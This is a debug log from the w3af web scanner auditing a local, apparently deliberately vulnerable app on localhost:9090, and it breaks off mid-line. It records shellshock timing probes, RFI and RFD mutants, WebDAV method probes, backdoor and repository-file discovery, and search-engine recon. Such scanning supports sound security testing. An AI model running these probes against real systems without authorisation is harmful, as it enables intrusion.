preg_replace.audit(did="5NNQSp9r",uri="http://localhost:9090/") took 0.07s to run [Wed Feb 12 09:36:08 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/ returned HTTP code "200" (id=63,from_cache=0,grep=1,rtt=1.46,did=ehlD1MFC) [Wed Feb 12 09:36:08 2020 - debug] GET http://www.google.com/xhtml?q=@localhost.&start=300 returned HTTP code "200" (id=78,from_cache=0,grep=1,rtt=1.01,did=jQKSI8DC) [Wed Feb 12 09:36:08 2020 - debug] ssl_certificate.audit(did="kNLjaJuS",uri="http://localhost:9090/") took 0.16s to run [Wed Feb 12 09:36:08 2020 - debug] rfd.audit(did="ct1y2IpX", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/%3B/w3af.cmd%3B/w3af.cmd" () [Wed Feb 12 09:36:08 2020 - debug] rfd.audit(did="ct1y2IpX",uri="http://localhost:9090/") took 0.45s to run [Wed Feb 12 09:36:08 2020 - debug] TRACE http://localhost:9090/ returned HTTP code "404" (id=80,from_cache=0,grep=1,rtt=0.11,did=y3ONNk8H) [Wed Feb 12 09:36:08 2020 - debug] xst.audit(did="l59Pqisy",uri="http://localhost:9090/") took 0.87s to run [Wed Feb 12 09:36:08 2020 - debug] rfi.audit(did="HfhCDJOa", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/gears_config.txt returned HTTP code "404" (id=85,from_cache=0,grep=1,rtt=0.10,did=SF0K988w) [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/gears-manifest.php returned HTTP code "404" (id=86,from_cache=0,grep=1,rtt=0.24,did=7CeJX6JF) [Wed Feb 12 09:36:08 2020 - debug] frontpage.audit(did="DYmdC5ig", uri="http://localhost:9090/") [Wed Feb 12 09:36:08 2020 - debug] HEAD http://localhost:9090/ returned HTTP code "302" (id=88,from_cache=0,grep=1,rtt=0.21,did=pfDzJFJ7) [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/site_manifest returned HTTP code "404" (id=83,from_cache=0,grep=1,rtt=0.03,did=WRz2gBvz) [Wed Feb 12 09:36:08 2020 - debug] GET http://localhost:9090/PhpInfo.php returned HTTP code "404" (id=81,from_cache=0,grep=0,rtt=0.19,did=q6tXqUXB) [Wed Feb 12 09:36:08 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:9 / max:50 / total:51) [Wed Feb 12 09:36:08 2020 - debug] Connections with more in use time: (ea99060d2e3c1bee, 0.29 sec) (a712a1ad5fc5ab9c, 0.28 sec) (cd9918a2d17819fb, 0.28 sec) (859514ff2302e122, 0.24 sec) (f830fbba42644f2d, 0.23 sec) [Wed Feb 12 09:36:08 2020 - debug] PROPFIND http://localhost:9090/ with data: " Select \'D..." returned HTTP code "404" (id=92,from_cache=0,grep=1,rtt=0.15,did=5mCxEzuE) [Wed Feb 12 09:36:09 2020 - debug] frontpage.audit(did="DYmdC5ig",uri="http://localhost:9090/") took 0.20s to run [Wed Feb 12 09:36:09 2020 - debug] RFI using local web server for URL: http://localhost:9090/ [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/cachemanifest.php returned HTTP code "404" (id=94,from_cache=0,grep=1,rtt=0.31,did=O6SFynEP) [Wed Feb 12 09:36:09 2020 - debug] phpinfo.discover(did="hz1QZP0K",uri="http://localhost:9090/") took 2.55s to run [Wed Feb 12 09:36:09 2020 - debug] import_results.discover(http://localhost:9090/, did=SaM618oA) [Wed Feb 12 09:36:09 2020 - debug] [import_results] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:09 2020 - debug] cors_origin.audit(did="j1kOq72o",uri="http://localhost:9090/") took 2.63s to run (0.52s 19% sending HTTP requests) [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/gears_manifest.gears returned HTTP code "404" (id=105,from_cache=0,grep=1,rtt=0.40,did=8tzFBCbr) [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/cache_manifest.gears returned HTTP code "404" (id=99,from_cache=0,grep=1,rtt=0.20,did=JesoKv3n) [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/.gitignore returned HTTP code "404" (id=100,from_cache=0,grep=0,rtt=0.33,did=KvJiwMFR) [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/.bzr/checkout/dirstate returned HTTP code "404" (id=102,from_cache=0,grep=0,rtt=0.29,did=fcjp8rih) [Wed Feb 12 09:36:09 2020 - debug] Archive.org did not find any pages. [Wed Feb 12 09:36:09 2020 - debug] GET http://localhost:9090/.cvsignore returned HTTP code "404" (id=97,from_cache=0,grep=0,rtt=0.19,did=EX2UBRwh) [Wed Feb 12 09:36:09 2020 - debug] http_in_body.grep(uri="http://localhost:9090/wp-login.php") took 1.23s to run [Wed Feb 12 09:36:09 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:09 2020 - debug] serialized_object.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] blank_body.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/wp-login.php") took 0.96s to run [Wed Feb 12 09:36:09 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] credit_cards.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] websockets_links.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] csp.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] dom_xss.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] archive_dot_org.discover(did="hNxunmSq",uri="http://localhost:9090/") took 3.38s to run [Wed Feb 12 09:36:09 2020 - debug] payment_webhook_finder.discover(http://localhost:9090/, did=ZAlDpgzj) [Wed Feb 12 09:36:09 2020 - debug] [payment_webhook_finder] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:09 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:09 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: LWsweJff) [Wed Feb 12 09:36:09 2020 - debug] import_results.discover(did="SaM618oA",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] url_fuzzer.discover(http://localhost:9090/, did=WPPCljOO) [Wed Feb 12 09:36:09 2020 - debug] [url_fuzzer] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:09 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:09 2020 - debug] keys.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/.bzrignore returned HTTP code "404" (id=98,from_cache=0,grep=0,rtt=0.16,did=OMcPO6TP) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/site-manifest.txt returned HTTP code "404" (id=111,from_cache=0,grep=1,rtt=0.52,did=rpj0IkkB) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/cache-manifest returned HTTP code "404" (id=109,from_cache=0,grep=1,rtt=0.06,did=42pZTNLR) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/offline_manifest.json returned HTTP code "404" (id=108,from_cache=0,grep=1,rtt=0.42,did=wJHQjywX) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/fetchmail/ returned HTTP code "404" (id=107,from_cache=0,grep=1,rtt=0.13,did=89YMPx6t) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/.hgignore returned HTTP code "404" (id=104,from_cache=0,grep=0,rtt=0.18,did=RglRi5wD) [Wed Feb 12 09:36:10 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=1 returned HTTP code "200" (id=96,from_cache=0,grep=0,rtt=1.50,did=g9OYFqNE) [Wed Feb 12 09:36:10 2020 - debug] GET http://localhost:9090/~fetchmail/ returned HTTP code "404" (id=110,from_cache=0,grep=1,rtt=0.17,did=4oHIBg0X) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/~Debian-exim/ returned HTTP code "404" (id=113,from_cache=0,grep=1,rtt=0.22,did=CiW1bgrs) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/.hg/dirstate returned HTTP code "404" (id=106,from_cache=0,grep=0,rtt=0.20,did=5ROJ4uds) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/Debian-exim/ returned HTTP code "404" (id=112,from_cache=0,grep=1,rtt=0.26,did=k4GrPErk) [Wed Feb 12 09:36:11 2020 - debug] ACL http://localhost:9090/ returned HTTP code "404" (id=114,from_cache=0,grep=1,rtt=0.09,did=Sk1Xn8Zb) [Wed Feb 12 09:36:11 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/wp-login.php") took 0.24s to run [Wed Feb 12 09:36:11 2020 - debug] clamav.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:11 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:4 / max:50 / total:51) [Wed Feb 12 09:36:11 2020 - debug] Connections with more in use time: (18e90d0005f69337, 0.12 sec) (859514ff2302e122, 0.11 sec) (ea99060d2e3c1bee, 0.11 sec) (2209cc403a0c5f20, 0.11 sec) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/~smmsp/ returned HTTP code "404" (id=115,from_cache=0,grep=1,rtt=0.13,did=ZJiXAWU9) [Wed Feb 12 09:36:11 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:11 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:HfhCDJOa) [Wed Feb 12 09:36:11 2020 - debug] find_dvcs.discover(did="RKHnLsTM",uri="http://localhost:9090/") took 2.22s to run [Wed Feb 12 09:36:11 2020 - debug] urllist_txt.discover(http://localhost:9090/, did=MbfoOBoI) [Wed Feb 12 09:36:11 2020 - debug] [urllist_txt] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:11 2020 - debug] rfi.audit(did="HfhCDJOa",uri="http://localhost:9090/") took 0.90s to run [Wed Feb 12 09:36:11 2020 - debug] html_comments.grep(uri="http://localhost:9090/wp-login.php") took 0.19s to run [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/smmsp/ returned HTTP code "404" (id=116,from_cache=0,grep=1,rtt=0.14,did=mXBiD5cX) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=117,from_cache=0,grep=0,rtt=0.19,did=2v0jCkwm) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/~eximuser/ returned HTTP code "404" (id=119,from_cache=0,grep=1,rtt=0.10,did=UDrDo3DR) [Wed Feb 12 09:36:11 2020 - debug] GET http://localhost:9090/gearsconfig.txt returned HTTP code "404" (id=120,from_cache=0,grep=1,rtt=0.30,did=AAD2okdB) [Wed Feb 12 09:36:11 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/wp-login.php") took 0.18s to run [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/gearsmanifest.php returned HTTP code "404" (id=118,from_cache=0,grep=1,rtt=0.27,did=tX7l0ZtF) [Wed Feb 12 09:36:12 2020 - debug] Returning fresh average RTT of 0.14 seconds for mutant 7b34d43e0db6f6b0713a9fc60359e929 [Wed Feb 12 09:36:12 2020 - debug] Returning cached average RTT of 0.14 seconds for mutant 7b34d43e0db6f6b0713a9fc60359e929 [Wed Feb 12 09:36:12 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/wp-login.php") took 0.27s to run [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/gears-manifest.gears returned HTTP code "404" (id=133,from_cache=0,grep=1,rtt=0.09,did=yqZEoOSO) [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/sitemanifest returned HTTP code "404" (id=121,from_cache=0,grep=1,rtt=0.17,did=ssFnAiMw) [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/DMIoG returned HTTP code "404" (id=132,from_cache=0,grep=1,rtt=0.17,did=LP8V4frD) [Wed Feb 12 09:36:12 2020 - debug] dav.audit(did="GXOPpO8n",uri="http://localhost:9090/") took 3.57s to run [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/snort/ returned HTTP code "404" (id=126,from_cache=0,grep=1,rtt=0.32,did=ZceyaRrA) [Wed Feb 12 09:36:12 2020 - debug] GET http://localhost:9090/eximuser/ returned HTTP code "404" (id=127,from_cache=0,grep=1,rtt=0.07,did=KR8W8DBe) [Wed Feb 12 09:36:12 2020 - debug] get_emails.grep(uri="http://localhost:9090/.listing") took 2.85s to run [Wed Feb 12 09:36:12 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] objects.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] error_500.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] meta_tags.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] password_profiling.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] click_jacking.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:12 2020 - debug] lang.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~defang/ returned HTTP code "404" (id=137,from_cache=0,grep=1,rtt=0.35,did=jfX43NeT) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~logwatch/ returned HTTP code "404" (id=124,from_cache=0,grep=1,rtt=0.11,did=Am3kAhsF) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=129,from_cache=0,grep=0,rtt=0.16,did=LWsweJff) [Wed Feb 12 09:36:13 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: LWsweJff) [Wed Feb 12 09:36:13 2020 - debug] detailed._login() took 1.08s to run [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/defang/ returned HTTP code "404" (id=130,from_cache=0,grep=1,rtt=0.29,did=3s9fPzS6) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/logwatch/ returned HTTP code "404" (id=131,from_cache=0,grep=1,rtt=0.23,did=dWrGPfn1) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/debian-tor/ returned HTTP code "404" (id=125,from_cache=0,grep=1,rtt=0.16,did=wYCQCw9s) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/cachemanifest.gears returned HTTP code "404" (id=122,from_cache=0,grep=1,rtt=0.12,did=LMPnHIWz) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~snort/ returned HTTP code "404" (id=123,from_cache=0,grep=1,rtt=0.25,did=ZYJ8qES6) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~privoxy/ returned HTTP code "404" (id=128,from_cache=0,grep=1,rtt=0.21,did=xrSm8GW3) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~debian-tor/ returned HTTP code "404" (id=136,from_cache=0,grep=1,rtt=0.26,did=FuqlwDWS) [Wed Feb 12 09:36:13 2020 - debug] url_session.grep(uri="http://localhost:9090/wp-login.php") took 0.33s to run [Wed Feb 12 09:36:13 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/offlinemanifest.json returned HTTP code "404" (id=135,from_cache=0,grep=1,rtt=0.47,did=VBJq7Zn0) [Wed Feb 12 09:36:13 2020 - debug] error_pages.grep(uri="http://localhost:9090/wp-login.php") took 0.05s to run [Wed Feb 12 09:36:13 2020 - debug] strange_reason.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] cache_control.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] strange_headers.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] ssn.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] oracle.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] feeds.grep(uri="http://localhost:9090/wp-login.php") took 0.00s to run [Wed Feb 12 09:36:13 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:3 / max:50 / total:51) [Wed Feb 12 09:36:13 2020 - debug] Connections with more in use time: (ea99060d2e3c1bee, 0.22 sec) (18e90d0005f69337, 0.17 sec) (859514ff2302e122, 0.01 sec) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/privoxy/ returned HTTP code "404" (id=134,from_cache=0,grep=1,rtt=0.12,did=QHY0rSdm) [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/openvpn/ returned HTTP code "404" (id=138,from_cache=0,grep=1,rtt=0.13,did=IUvCPyaa) [Wed Feb 12 09:36:13 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/wp-login.php") took 0.15s to run [Wed Feb 12 09:36:13 2020 - debug] GET http://localhost:9090/~openvpn/ returned HTTP code "404" (id=140,from_cache=0,grep=1,rtt=0.28,did=0OoSd2bl) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/nagios/ returned HTTP code "404" (id=142,from_cache=0,grep=1,rtt=0.05,did=C4JknwZz) [Wed Feb 12 09:36:14 2020 - debug] GET http://www.google.com/search?q=@localhost.&start=300&sa=N&hl=en returned HTTP code "200" (id=141,from_cache=0,grep=1,rtt=1.63,did=ZTXgWKiU) [Wed Feb 12 09:36:14 2020 - debug] Google search for: '@localhost.' returned 0 unique results [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=144,from_cache=0,grep=1,rtt=0.33,did=mlZKkcVf) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/manifest.php returned HTTP code "404" (id=146,from_cache=0,grep=1,rtt=0.25,did=d5uk92nE) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=147,from_cache=0,grep=1,rtt=0.32,did=2v0jCkwm) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/urllist.txt returned HTTP code "404" (id=148,from_cache=0,grep=1,rtt=0.28,did=cjRMqk95) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/~ntop/ returned HTTP code "404" (id=149,from_cache=0,grep=1,rtt=0.11,did=wJT2Wcf7) [Wed Feb 12 09:36:14 2020 - debug] GET http://localhost:9090/ntop/ returned HTTP code "404" (id=150,from_cache=0,grep=1,rtt=0.29,did=RguLhfqy) [Wed Feb 12 09:36:14 2020 - debug] symfony.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:14 2020 - debug] file_upload.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:14 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:14 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/bigsis/ returned HTTP code "404" (id=151,from_cache=0,grep=1,rtt=0.09,did=PrWO7Hbh) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/site_manifest.txt returned HTTP code "404" (id=139,from_cache=0,grep=1,rtt=0.24,did=dZ7M9WdO) [Wed Feb 12 09:36:15 2020 - debug] finger_google.discover(did="ZKzvI2tq",uri="http://localhost:9090/") took 5.63s to run [Wed Feb 12 09:36:15 2020 - debug] find_backdoors.discover(http://localhost:9090/, did=yPXZoTJn) [Wed Feb 12 09:36:15 2020 - debug] [find_backdoors] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:15 2020 - debug] [id: 140100635385616] HTTP response delay was 0.32. (lower, expected, upper): 8.00, 8.00, 16.17. [Wed Feb 12 09:36:15 2020 - debug] [did: 2v0jCkwm] [id: 140100635385616] Failed to control HTTP response delay for URL http://localhost:9090/ - parameter "User-Agent" for 8 seconds using , response wait time was: 0.324299097061 seconds and response ID: 147. [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/~bigsis/ returned HTTP code "404" (id=152,from_cache=0,grep=1,rtt=0.15,did=g0AoGFVj) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=145,from_cache=0,grep=1,rtt=0.19,did=2v0jCkwm) [Wed Feb 12 09:36:15 2020 - debug] LINK http://localhost:9090/ returned HTTP code "404" (id=154,from_cache=0,grep=1,rtt=0.43,did=uRLIxnEe) [Wed Feb 12 09:36:15 2020 - debug] GET http://pgp.mit.edu:11371/pks/lookup?op=index&search=localhost. returned HTTP code "500" (id=143,from_cache=0,grep=0,rtt=2.60,did=ER4XBHF0) [Wed Feb 12 09:36:15 2020 - debug] [id: 140100634362896] HTTP response delay was 0.19. (lower, expected, upper): 8.00, 8.00, 16.17. [Wed Feb 12 09:36:15 2020 - debug] [did: 2v0jCkwm] [id: 140100634362896] Failed to control HTTP response delay for URL http://localhost:9090/ - parameter "User-Agent" for 8 seconds using , response wait time was: 0.18837594986 seconds and response ID: 145. [Wed Feb 12 09:36:15 2020 - debug] PKS search for hostname: "localhost." returned 0 results. [Wed Feb 12 09:36:15 2020 - debug] finger_pks.discover(did="Roq60N1e",uri="http://localhost:9090/") took 5.78s to run [Wed Feb 12 09:36:15 2020 - debug] web_spider.discover(http://localhost:9090/, did=wKQcq2el) [Wed Feb 12 09:36:15 2020 - debug] [web_spider] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/cache_manifest returned HTTP code "404" (id=155,from_cache=0,grep=1,rtt=0.31,did=dnwn0NrZ) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/offline-manifest.php returned HTTP code "404" (id=153,from_cache=0,grep=1,rtt=0.08,did=noSmgFDa) [Wed Feb 12 09:36:15 2020 - debug] shell_shock.audit(did="2v0jCkwm",uri="http://localhost:9090/") took 5.05s to run (1.02s 20% sending HTTP requests) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/~nagios/ returned HTTP code "404" (id=156,from_cache=0,grep=1,rtt=0.09,did=GVIJt9yq) [Wed Feb 12 09:36:15 2020 - debug] Updating socket timeout for localhost from 4.41 to 3.00 seconds [Wed Feb 12 09:36:15 2020 - debug] urllist_txt.discover(did="MbfoOBoI",uri="http://localhost:9090/") took 1.61s to run [Wed Feb 12 09:36:15 2020 - debug] find_captchas.discover(http://localhost:9090/, did=4fnUpKXg) [Wed Feb 12 09:36:15 2020 - debug] [find_captchas] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/scanlogd/ returned HTTP code "404" (id=160,from_cache=0,grep=1,rtt=0.16,did=IEWB7PyP) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/pf/ returned HTTP code "404" (id=157,from_cache=0,grep=1,rtt=0.07,did=cbQAzYRX) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/iplog/ returned HTTP code "404" (id=158,from_cache=0,grep=1,rtt=0.12,did=TvQewvrL) [Wed Feb 12 09:36:15 2020 - debug] GET http://localhost:9090/gears-config.json returned HTTP code "404" (id=161,from_cache=0,grep=1,rtt=0.16,did=i67ShA1i) [Wed Feb 12 09:36:15 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:LThDS5w4) [Wed Feb 12 09:36:15 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:15 2020 - debug] Raising HTTP error "RMDIR" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:LThDS5w4). [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/gears_manifest returned HTTP code "404" (id=164,from_cache=0,grep=1,rtt=0.28,did=ExiZBmhQ) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/xfs/ returned HTTP code "404" (id=165,from_cache=0,grep=1,rtt=0.15,did=G9jgq6DC) [Wed Feb 12 09:36:16 2020 - debug] http_in_body.grep(uri="http://localhost:9090/robots.txt") took 1.01s to run [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/gearsmanifest.gears returned HTTP code "404" (id=167,from_cache=0,grep=1,rtt=0.33,did=6OVfnhp7) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/~gdm/ returned HTTP code "404" (id=170,from_cache=0,grep=1,rtt=0.09,did=gaaJ43QP) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/~iplog/ returned HTTP code "404" (id=159,from_cache=0,grep=1,rtt=0.16,did=qcDSujWJ) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/~pf/ returned HTTP code "404" (id=163,from_cache=0,grep=1,rtt=0.37,did=aefschrE) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/manifest.gears returned HTTP code "404" (id=169,from_cache=0,grep=1,rtt=0.33,did=GN1HI1EG) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/gnats/ returned HTTP code "404" (id=168,from_cache=0,grep=1,rtt=0.16,did=MQHGQr7G) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/~scanlogd/ returned HTTP code "404" (id=171,from_cache=0,grep=1,rtt=0.40,did=AerbzGM2) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/gdm/ returned HTTP code "404" (id=166,from_cache=0,grep=1,rtt=0.14,did=uXPupoch) [Wed Feb 12 09:36:16 2020 - debug] GET http://localhost:9090/cache-manifest.txt returned HTTP code "404" (id=162,from_cache=0,grep=1,rtt=0.22,did=5IWutPaB) [Wed Feb 12 09:36:16 2020 - debug] expect_ct.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] svn_users.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] private_ip.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] motw.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] meta_generator.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:16 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:RBIFiX0j) [Wed Feb 12 09:36:16 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:16 2020 - debug] Raising HTTP error "REPLY" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:RBIFiX0j). [Wed Feb 12 09:36:16 2020 - debug] get_emails.grep(uri="http://localhost:9090/wp-login.php") took 1.72s to run [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=173,from_cache=0,grep=1,rtt=0.27,did=7GCqAfgR) [Wed Feb 12 09:36:17 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=11 returned HTTP code "200" (id=172,from_cache=0,grep=0,rtt=1.20,did=rsnB8XES) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/filesInCache.php returned HTTP code "404" (id=174,from_cache=0,grep=1,rtt=0.17,did=FoneocLL) [Wed Feb 12 09:36:17 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:17 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:1 / max:50 / total:50) [Wed Feb 12 09:36:17 2020 - debug] Connections with more in use time: (3ce9ab02a668de73, 0.00 sec) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/~_ntp/ returned HTTP code "404" (id=175,from_cache=0,grep=1,rtt=0.20,did=VYOmQXpN) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/~xfs/ returned HTTP code "404" (id=177,from_cache=0,grep=1,rtt=0.07,did=DibwDfVG) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/~gnats/ returned HTTP code "404" (id=179,from_cache=0,grep=1,rtt=0.16,did=k1G9QfdS) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/~www-data/ returned HTTP code "404" 